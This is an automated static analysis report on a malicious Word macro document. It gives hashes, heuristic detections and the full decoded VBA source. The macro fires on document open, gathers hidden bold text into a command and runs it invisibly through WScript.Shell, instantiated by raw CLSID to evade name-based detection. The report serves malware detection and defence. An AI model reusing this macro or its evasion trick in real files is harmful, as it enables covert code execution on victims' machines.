Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 66af536f09d0d2b2…

MALICIOUS

Office (OOXML)

33.6 KB Created: 2021-03-02 08:06:00 UTC Authoring application: Microsoft Office Word 15.0000 First seen: 2022-06-20
MD5: 1a1f638032ca63a01c77966a69753134 SHA-1: 2beb3e2e1909eef5666dfc3af7517d8d4ec4148c SHA-256: 66af536f09d0d2b26dcb498b5343c231e6df08cc6a2395bab3e9bef09617da29
130 Risk Score

Heuristics 5

  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • VBA instantiates a dangerous COM class by CLSID critical OLE_VBA_GETOBJECT_CLSID_DANGEROUS
    VBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on.
    Matched line in script
    Set vb09 = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8")
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    Set vb09 = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8")
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 2959 bytes
SHA-256: 01e9f19dbe75b9eeb1b096cbd7f00848766f05ebb07bac69c1e42125029a7b12
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True


Dim pfiays As String


Private Sub Document_Open()
Call nmngtyy
End Sub

Private Sub nmngtyy()




Call zoRGbKq.MJZeDZthT




End Sub






Attribute VB_Name = "zoRGbKq"





Sub zkGNkuoJBwNLwqzYmFHm(fAsOrBYGXcskHVrWSVwQtX, sjRRlDEcDApDazDM, upCRIcEhrPubHndHjAfakmDTzokSSRWPIGWD)
RTslPZsfSARalkQYMAsPJyrWHVbXrW = 3.02622430229299E+36
ORmi = "NbUUveiwvkLGjzZE"
XZScVetyVnvzCJzC = 65008274
KlfX = "fPuaWKVnsxwytNPnsw"
End Sub



Public Sub MJZeDZthT()

On Error Resume Next
















   Dim myShape As InlineShape
    Dim myRange As Range
    For Each myRange In ActiveDocument.StoryRanges
        For Each myShape In myRange.InlineShapes
            myShape.Delete
        Next myShape
    Next myRange
Dim zxd As Variant
Dim zxtgsaqeyhzfgds3re As String



Dim oRng As Range
Dim oNewRng As Range
Set oRng = Selection.Range '(the formatted range you are wanting to write)
oRng.MoveEndWhile Chr(32), wdBackward 'Remove trailing spaces from the range
Set oNewRng = ActiveDocument.Range 'Locate the range where it is to be written
oNewRng.Collapse wdCollapseEnd
'oNewRng.FormattedText = oRng 'then write it.





 Dim Para As Paragraph
    Dim i As Long

    Application.ScreenUpdating = False
    With ActiveDocument
        For i = .Paragraphs.Count To 1 Step -1
            Set Para = .Paragraphs(i)
            With Para
                If .Range.End - .Range.Start = 1 Then
                    .Range.Delete
                Else
             If 9.4 + Sin(66) = 45.66 Then
                Else
                  .SpaceBefore = 6
                    .SpaceAfter = 6
                End If
                End If
            End With
        Next i
    End With
    Application.ScreenUpdating = True




Dim singleLine As Paragraph
   Dim rng As Range
   Dim pos As Integer
    Dim Wrd As Range

   For Each singleLine In ActiveDocument.Paragraphs
      Set rng = singleLine.Range
   
   
    
    
         If rng.Font.Bold Then
            'MsgBox "This is bold"
               lineText = singleLine.Range.Text
          zzOTXPoDh = zzOTXPoDh + lineText
        
       ' MsgBox (zzOTXPoDh)
         End If
     
   Next

WpkbB = "xOKhf"
fE = "JCT"
TDOvQ = "F"
fgmV7c9 = TQizCJo
HKODnr = "ok"
YmBx = "436"
s4n2 = "KyeOwJhq"
b7n87s = "7QnemiX"
BL3u7 = "c5KuqKtg4gr"




ZFF = Null
VCFGv = ZFF



zzOTXPoDh = Replace(zzOTXPoDh, "yueaavtwlqn", "")




Set vb09 = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8")
vb09.Run Gravity & "" & zzOTXPoDh, 0.0001



End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 15360 bytes
SHA-256: a428d7913b8529b464d1e41a62587db5f45f6ffd2763205355e211e38c49561c